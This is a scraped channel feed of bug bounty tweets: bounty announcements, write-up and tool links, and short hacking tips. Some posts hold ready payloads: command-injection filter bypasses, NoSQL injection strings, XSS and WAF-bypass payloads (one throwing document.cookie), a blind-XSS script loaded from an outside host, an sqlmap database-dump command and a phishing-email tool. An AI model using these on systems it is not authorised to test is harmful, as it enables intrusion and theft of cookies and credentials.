Bug Hunting Hub
The source of insights for Bug Hunters. The channel is driven by a bot, curated by twitter.com/makrushind
instagram.com/makrush.in
#BugBountyTips of the Day
Yesterday found two DOM XSS with the help of DOM Invader. Thank you @PortSwigger for making this amazing extension 😍🔥 Tip: Use DOM Invader for finding DOM XSS manually. #burptips #bugbountytips https://t.co/ma4PScAffj
---
Been learning for ~2 weeks, this is my first #Rust program: a fast tool to scan for prototype pollution vulnerabilities. https://t.co/9fqxPYpUSF Thanks to @R0X4R for the tip! #infosec #bugbounty #bugbountytips
---
#XSS filter evasion cheat sheet <3 If anyone can turn this into a graphic, feel free to :) <3 i am not an artist x) #BugBounty #infosec #hacking https://t.co/5ZRgU0fhKE
---
Command Injection(Bypass Blacklisted words) Bypass with single quote w'h'o'am'i Bypass with double quote w"h"o"am"i Bypass with backslash and slash w\ho\am\i /\b\i\n/////s\h Bypass with $@ who$@ami #bugbounty #bugbountytips #bugbountytip
---
Laravel phpunit RCE. #bugbountytips #rce #laravel https://t.co/0PmnqEbFfu
#BugBountyTips of the Day
#Repost 3. Let’s Bypass CSRF Protection & Password Confirmation to Takeover Victim Accounts Blog: https://t.co/JBFSI3ZHv9 #appsec #infosec #webappsec #hacking #bugbounty #bugbountytips #Repost
---
Facebook Bug bounty 🤞 #bugbounty #infosec https://t.co/N9bhnWXzzi
---
Payloads for NoSQL Injection true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); #bugbounty #bugbountytips
---
Always check the "unsubscribe" option at the bottom of emails. Sometimes this will give you unauthorized access to the victim's email settings. The URL format [not always] will be like: https://target/unsubscribe/Subscription.aspx?email=<victims_email> #bugbounty #bugbountytips https://t.co/NnB01xDFSI
---
Hello! I created a small repository related to Android Security. The repository contains notes, writeups, reports, good reads and a lot more things. Gradually, I will update more resources and notes there. Check out: https://t.co/fqxULjSBl9 #AndroidSecurity #BugBounty #Hacking
---
#bugbountytips I made Part 2 of the Prototype Pollution Series https://t.co/S7l5ySns9G Soon there will be more blog posts on the same in detail. I need your support, friends. Thanks @debangshu_kundu @KathanP19 @iamsarvagyaa @WHOISbinit @huntrdev
#BugBountyTips of the Day
Since my first day of joining on @Hacker0x01 @jobertabma I’ve submitted many reports to Hackerone and end result is always a Dup/informative. I didn’t give up and today I got my first valid find on Hackerone 🧡 This hits different #bugbounty #nevergiveup https://t.co/LwKrTHRuaG
---
Infosec Entry level Interview Questions 101 📜🏆 PS: These are the list of questions I have come across and questions faced by my students in their interviews. Feel free to add more below 👇 1. What is your fav OWASP Top 10 bug 2. Explain your methodology? #infosec #bugbounty
---
Add a SSTI payload to your Blind XSS payload, if you are lucky, you have a visual internal SSTI in a critical endpoint. ${{48*53}}`'";--><sCRIpt sRc=//your.oob></sCRIpt> #BugBountyTips #BugBounty
---
Email verification bypass 1. Create your account 2. Open Burp Suite, intercept on for request to response 3. Enter any code and click verify 4. Change 403 un.--->200 OK err--->success invalid code--->valid code #bugbountytips
---
If anyone would like to join @SynackRedTeam and have questions around Onboarding Process. Join me , Kelsey and @rfkrishnan today 9:00 PM IST on clubhouse to discuss the same , RSVP: ( https://t.co/TbJSGMTNHQ) #BugBounty #infosec #Pentesting
---
The video of the free webinar "Forensic Analysis of IIS" is now available. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/JZtYKud1ta https://t.co/TXJryr4YgP
#BugBountyTips of the Day
I Earned $12,000 for my Submission. Bug Type: Blind SQL Injection. #bugbounty #bugcrowd #infosec #security #bountyhunter https://t.co/jPZlxlgHtf
---
Blogged about another topic from @null0x00 study group! Covering #OAuth basics and vulnerabilities around it. https://t.co/H0GAKEa1bT #infosec #bugbountytips #bugbounty
---
Bypassing Payment Process:) Somewhere from Internet. #bugbountytips https://t.co/LBP043RJd1
#BugBountyTips of the Day
Cerbrutus - (SSH Bruteforcing) - Much faster & reliable than any other existing solutions. We've tested it against Hydra with over a 200% speed improvement. (SMB, FTP, HTTP, coming soon!) - Repo: https://t.co/592a0vNnYb - #CyberSecurity #CTF #BugBounty #bugbountytips #infosec https://t.co/WPF5WwzKb5
---
-Tip 8/31- #bugbountytips White-box Pentest? Learn the dangerous functions of the tested language. Java: https://t.co/9VmPu5HZWI .NET: https://t.co/sFHeKFPVKQ PHP: https://t.co/pnIqHzSTmj Ruby: https://t.co/KcLNVs5Byj (Or simply Google: [language] + security best practices)
---
Advanced SQL Injection in Oracle databases #infosec #pentest #redteam #bugbounty https://t.co/8QAXb4moGd https://t.co/61tyLCw8Zq
---
I have decided to write on Medium after a long time, so please share your thoughts and criticisms.🔥, I hope you enjoy it.😃 Params — Discovering Hidden Treasure in WebApps https://t.co/HgyyYjcusx #bugbounty #bugbountytips #bugbountytip
#BugBountyTips of the Day
Received $25K Bounty 🥳 #bugbounty #infosec #cybersecurity https://t.co/fToMOj8gVE
---
1 - Found an ATO that required knowing the victim's UUID 2 - Couldn't find a way to get the UUID 3 - Saw that @Yassineaboukir was also in the program 4 - Asked Yassine if he knew how to get the UUID 5 - He found a way to get the UUID 6 - Full ATO #togetherwehitharder #bugbounty
---
Account Takeovers — Believe the Unbelievable by @niksthehacker https://t.co/sRDcXJoGBo #bugbounty #infosec #hacking
---
I just published Account Takeovers  - Believe the Unbelievable https://t.co/R3pLG8TKyr #bugbounty #Pentesting #bugbountywriteups #bugbountytips
---
Back in Bug bounties 2 days , 2 SQL injections -Error Based -Blind boolean based. Takeaway : Tamper every parameter in every request. #bugbounty #bugbountytip #bugbountytips #HackThePlanet
---
When hunt on @Bugcrowd after 1 month ( currently busy in clg stuff ) & hit some P1's in a row I'm still worthy :) #bugbountytip 1st- Check for signup endpoint in grafana , sometimes Dev's forget to hide 2nd - Never forget to fuzz subdomains , you may access docker credentials https://t.co/0gjSdStjNQ
#BugBountyTips of the Day
Have a nice weekend everyone! 🏞️🗻👏🎂🎂🏍️💫💖 #bugbounty #infosec https://t.co/Bax1rfXdIn
---
Two sensitive files that you can add to your automation while fuzzing Wordpress based websites: /wp-config.php.bak --> A lot of leaked info including database credentials. /wp-content/debug.log --> All PHP related debug data. #bugbountytips #Hacking #infosec
---
Don't give up too fast if all your standard XXE payloads don't work 😭@nullenc0de has you covered with another way to extract juicy information! 😎#bugbountytips https://t.co/Q2DgMXQHhd
---
Got a S3 bucket but don't know who is the owner ?? Use the below command to check the bucket owner aws s3api get-bucket-acl --bucket bucket-name #bugbountytip #bugbountytips #infosec #AWS
#BugBountyTips of the Day
Labs for Web application Pentesting Practice SQLi- https://t.co/DV8ANQHob5 Oauth 2.0- https://t.co/lNOV55WJFU GraphQL- https://t.co/N5i1ZA4oN2 JWT Authentication- https://t.co/6ZbeTcoXqp SAML Authentication- https://t.co/0omfjMRNzV XSS- https://t.co/MSfR76JWjO #bugbounty
---
(PhishMailer - Create Professional Phishing Emails Fast And Easy) - https://t.co/LCjXqQQREs #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/lc6TrfSOa5
---
What happens when you use 100% of your brain? Thanks developer for putting the password reset OTP right there! Crazy bugs hunting with @MAALP1225 #bugbounty https://t.co/biA3JVd2z1
#BugBountyTips of the Day
Yay, I was awarded a $10,330 bounty on @Hacker0x01! #TogetherWeHitHarder #BugBounty #bugbountytips YESSSSSSSSSSSSSSSSSS LETS GOO 🙏🙏💸💸💎💎
---
A Pentester’s Guide to Server Side Request Forgery (SSRF) https://t.co/chxMHbuoLn #bugbounty #infosec #hacking
---
Go to your android/ios device setting and change the device name to ur BXSS payload like "><script/src=//gujju.xss.ht>//" and enable 2FA for all applications using Authenticator/authy/okta. you might end up with blind XSS for the internal admin panel. #bugbounty #bugbountytips
---
Inspired By @ADITYASHENDE17 Slides That Called Abusing Functions For #bugbounty I Have Been Collecting A Lot Of Log In Tips , So Here Is My Log In Checklist With All Resources Links https://t.co/1rHrRIBsFO If You Have Any Question , DM Me . https://t.co/laYjOtCjfh
---
Hey all! A quick AEM #bugbountytip for you guys! Appending the query "?tidy=true" to the JSON output of any endpoint prettifies it for you. (Check pics 1&2) Also, certain times it might help you to break the caching behaviour of AEMs too! Have fun with this. (Pic 1/2) https://t.co/f7gioG7KMf
#BugBountyTips of the Day
Alhamdulillah I earned $1,750 for my submission on @bugcrowd #ItTakesACrowd #Love to pwn Api function #Api endpoint bypass #bugbounty https://t.co/77BvCGQGmT
---
Achieved 1k+ REPUTATION points by doing manual hunting & sticking to single program for nearly 3 months (40+)/60 issues got TRIAGED As @zseano always says, "Spend months on same program with the intentions of deep dives" Thanks @zseano for those words #bugbounty #bugbountytip https://t.co/q47o7Kk0S4
---
Hey Hackers 👋 I have created a small script to automate the workflow mentioned in https://t.co/gGpYssmwIv by @m4ll0k I would love to hear some suggestions to the tools name #bugbounty #hackerone #bugcrowd N.B: Some of his tools used in the gist are still private
---
I just published Broken Access control bug: Bypassing 403’s by finding another endpoint that does the same thing. https://t.co/vtmSd9vcsF #bugbountytips #infosec
#BugBountyTips of the Day
Oh my god, this is one of the best days in my life :D, finally, after 3 months (For God's sake Microsoft), it's finally here, I'm honored to say working with the MSRC team for over 3 years been my golden moments Thank you, God <3 Thank you, MSRC <3 #bugbounty #cybersecurity https://t.co/4YWG5tu8xe
---
Yay, I was awarded a $7,000 bounty on @Hacker0x01 ! https://t.co/MuYgWXpUZP #TogetherWeHitHarder It was a Web Cache Poisoning vulnerability within one of the private HackerOne program. Explore @albinowax portswigger's research to dive deeper. #HackerOne #Bugcrowd #BugBounty https://t.co/QeZxrVkdzw
---
Yesterday, hopped on a call with friends and an organization's team members to clarify bugs. The team member started laughing when my friends talked because of their English accent. I think that this attitude and behavior has no space in the #Bugbounty or #infosec world. I'm ashamed.
---
It was a nice vacation. #BugBounty changed my life. Thanks all bug bounty platforms, especially @Hacker0x01 and @intigriti https://t.co/V5nyCnOomR
---
Inspired By @ADITYASHENDE17 Slides That Called 2FA Bypassing For #bugbounty I Have Been Collecting A Lot Of 2FA Bypassing Tips , So Here Is My 2FA Bypassing Checklist With All Resources Links https://t.co/J00a2wr7dF If You Have Any Question , DM Me . https://t.co/psnq2Dn7ys
---
#Security_Workbook_on_Pentesting Update Changed the domain from https://t.co/uVbzmFBDhT -> https://t.co/b0sMe3qILM Thanks to all the contributors, it is because of them what it is today, @chaskar_shubham @Sunil45_ @sonumohapatra92 @M0hn1sh @u1tran00b @aakhadse29 #bugbountytips
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01! Bug: Response Manipulation allowed to access Admin Panel example changing type:user to type:admin made me temporary admin for session #TogetherWeHitHarder #BugBounty
#BugBountyTips of the Day
Improper access control edge case. /admin/index.jsp --> 403 /;/admin/index.jsp --> 200 #bugbounty #bugbountytips #hackerone #infosec #ethicalhacking #infosec #whitehat
---
Awesome articles on Shodan, Github and Google Dorking By @securitytrails might help you in Bug Hunting, give them a read. Shodan:- https://t.co/DmEDyioiiB Github:- https://t.co/oQ7NmjZwOe Google:- https://t.co/dFpwAOTh3C #bugbountytips #infosec
---
We are planning to add full XSS scan section in @PrettyRecon . Features include. 1. Single target xss scan. 2. All target xss scan (source of urls from web archive) 3. Parameter finding tool. 4. DOM xss scanner. 5. Prototype pollution xss finder. 6. Web crawler. #bugbounty #recon
---
YApi RCE 🔥 POC: https://t.co/6GVzg3ic0Y #bugbountytips #RCE #YApi https://t.co/yHsheIaR1g
---
The video of the free webinar "Capturing Network Traffic" is now available. #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/Zff0ix4Unn https://t.co/5cstKKN8Nx
#BugBountyTips of the Day
I've been on both the @hackerone program side and the #bugbounty hunter side of frustrating CVSS discussions, so I gave some thought into what I think is the root of many of the frustrations, and how they might be circumvented. Read my thoughts here: https://t.co/acHAWvtF05
---
I’ll be posting code and a video later today showing you how to hunt for vulnerabilities inside android apks. #bugbountytips #mobilehacking #bugbounty #ShareKnowledge
---
Decided to create "BountyTricks", a repo with private modules and bounty related tricks I'll add from time to time, starting with a fresh nuclei SSRF module which takes endpoints as input and checks if they are vulnerable to SSRF - at scale https://t.co/HudBCDBoqj #bugbountytips
---
Hacking is all about being creative! @inhibitor181 is once again showing that to us with this week's #bugbountytip! Sometimes, changing the "Content-Type:" can do wonders 💥 https://t.co/WjLMNuqCOj
---
I’ve had many requests for classes, training and mentoring, I will be starting FREE #hacking and #bounty courses in about a month and I will let everyone know how to join. No BS, No Cost. Teaching Mobile, Web, Network, Cloud, Hardware #hacks #shareknowledge #bugbounty #hackers
---
Some easy bugbounty tips for beginners #bugbountytips #bugbounty
---
Finally after lots of hard-work, managed to get CROSS-TENANT issues Tip: 1. User1 can send invitation to new Users on Org1 2. User1 change org_id from Org1 to Org2 3. Invitation gets sent as Org2 context on new User email #bugbounty #bugbountytip #bugbountytips https://t.co/7NYlEHM0Rm
#BugBountyTips of the Day
Collection of SQL injection write-ups. Thanks to all researchers for sharing their research. https://t.co/kR0NrDyCUL https://t.co/aSIPH8PTH1 https://t.co/yY6P4xOS1V https://t.co/QXPQGjA0ji https://t.co/4PGNVvVzDD #bugbountytips #bugbountytip #SQLi #mah3Sec_ #cybersecurity (1/3) https://t.co/6HZlzyopSw
---
New #byp4xx in python: - Amount of lines reduced from ~350 to ~150 - Accepts ANY cURL option - More HTTP verbs - New module with 2454 UAs from SecList Waiting for your feedback, recommendations... ^u^ #bugbountytips #infosec https://t.co/bw6DXj5Vtw
---
People who are crying for #bugbounty courses, mentors, hacking classes: this is all you need https://t.co/1vqacXTEds https://t.co/NoSci50zyw https://t.co/GNwyebSB2M https://t.co/wn2gZ4pgEn The problem is you guys will never complete those trainings at all 💔
Who’s Security Champion? You’re the Champion!

To properly implement a product maturity program, organizations need to embed and grow security expertise. Cultivation of application security champions requires the right pivot point in the following topic: application bug hunting and mitigation strategy.

This training is designed to be useful both from the perspective of a learner who starts a bug hunting journey on his weekend, as well as software engineers who want to dig deeper into the AppSec automation during software development lifecycle. Get on board!

https://makrushin.com/hitb2021/
#BugBountyTips of the Day
MANSPIDER - Spider Entire Networks For Juicy Files Sitting On SMB Shares. Search Filenames Or File Content - Regex Supported! https://t.co/ffajymTLGw #cybersecurity #bugbountytips #hacking #tools https://t.co/RUUdiBHyJA
---
Cool bounty received today for a simple and easy RCE on @Facebook. Write-up will be in the coming 2 days #bugbountytip today [Everything is simple in this life] #bugbounty #facebook https://t.co/sodEZfV1qj
---
Saved A*s of a company from following data leak trend😂 2 billion users PII leaked through endpoint (contains banking details too) #databreach #securitybreach #bugbounty #hacking #dataleakage #bugbountytips #bugbountytip @sechunt3r @ADITYASHENDE17 @sratarun https://t.co/3F9MSN1Y61
---
€150 reward Tips: 1. https://t.co/Z1i0OuDc1s use the AEM 2. I use this tool https://t.co/51L0gVX3bW 3. python3 https://t.co/biH3gLSDrV https://t.co/a5C8ygXmhu 4. found the https://t.co/NgBKtykZ32 5. Boom! , information #BugBountyTip #BugGounty https://t.co/vj2KSACLei
---
#bugbountytip #bugbountytips Check for these keywords in WayBackURL: password, secret, token, access, pwd, api, .json, = http, =%2F, =/, email=, @, ey, .txt, aws, admin, .js, config, dashboard, oauth Also search for these same keywords in source code.
#BugBountyTips of the Day
Some #hackers REFUSE tell you how to make $50, or $100 for low #vulnerabilities, but I WILL #teach and show how to submit those low #bugs and how to #makemoney on a #bugbounty program for FREE. Submitting low #bugs cleans the web!!! Class signup starts tomorrow #shareknowledge https://t.co/kYYIMIPWdU
---
Forgot to announce that I have joined the @detectify crowdsource platform and will be helping submit vulnerabilities to help secure their customers! #bugbounty #crowdsource
---
Request + Response + Matcher = Nuclei Template ♥️ Detailed blog about writing your Own Nuclei Template! https://t.co/RRJgpULslA #nuclei #bugbountytips #hackwithautomation #bugbounty @pdiscoveryio
---
Bypass Cloudflare for XSS! payload :javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie thanks @HoseinVita #bugbountytips
---
I tried harder 😈 #bugbounty #infosec https://t.co/3ni8Oy8k6e
---
🚨🚨 Hackers and beginners guide to Docker Containers is finally here. Link : https://t.co/IssSuNmrtP A big thanks to awesome reviewers: @ianmiell @aurelievache @sanjogpanda @m4giktrick @KathanP19 @i_shivamsoni #infosec #security #cybersecurity #hackers #containers #bugbounty
---
When js file says not found, add .download after .js , maybe you can access that .js file #bugbountytip #bugbounty https://t.co/GkmrR0i1q4
---
New Write-up: How I bypassed a tough WAF to steal user cookies using XSS and how it ends with N/A! I have made an XSS Lab that simulates the restrictions I met in this application, you can give it a try! https://t.co/k3vj2CLkF9 #bugbounty #bugbountytips https://t.co/YD2sHAKayF
#BugBountyTips of the Day
CloudFlare WAF ByPass HaHaHa Nice :) Attack: XSS Payload: test",prompt%0A/*HelloWorld*/(document.domain) Example: https://t.co/tKS0EyAoPL #BugBounty #bugbountytips #wafbypass #cloudflare https://t.co/P7xe5Kay4R
---
#bugbountytips This is an AMAZING resource, a list with bug bounty tools. Honestly the best i found so far, do you have a better list? https://t.co/uswaWJmFqY
---
In these blessed days someone gave a very very bad and critical report to @Facebook 😎 Today I was able to access & get full control of about 12 servers and a lot more, etc… for Facebook 😍 Write-up will be tomorrow for all the bugs that I sent to Facebook. Happy Eid ❤️ #bugbounty https://t.co/45Uzo39FSj
---
Sign up for Hacking Classes now FREE!!! The First Class "HACKING RECON" starts August 4th, 2021 - 9:00am CST A live link to watch the class will be posted in the classroom and on Twitter every day before classes. #BugBounty #ShareKnowledge #giveback https://t.co/EGTboDopVu
---
Once again 😈 #bugbounty #infosec #cybersecurity #CyberSecurityN8 https://t.co/e47xUPPBuz
---
Bypass WAF and dump current databases :) !! Command : https://t.co/3z8lSkvu8A -r request.txt -p "value" -v 3 --level=5 --risk=3 --time-sec=15 --tamper=between --current-db --no-cast Credit : Pls Mention ... #bugbountytips #secnhack #hackerone #cybersecurity #infosec #bugcrowd https://t.co/ffEQK1gkMm
#BugBountyTips of the Day
(DARKARMY - Collection Of Penetration Testing Tools, Every Hacker Needs) - https://t.co/4yt3lLfwzi #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/fbmsCbTdGm
---
I just published How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools @XHackerx007 @aditi_singghh @waseyuddin @snewbill @Farah_Hawaa @sillydadddy @Alra3ees https://t.co/IG26AB3zN9 #bugbounty #bugbountytips #bugbountytip
---
If you are currently using Kali Linux that is fine for the upcoming class, we will be using Terminal for this entire class. We will not be using GUI's at all in this class. I want to teach you how to do #bugbounty recon without 3rd party tools.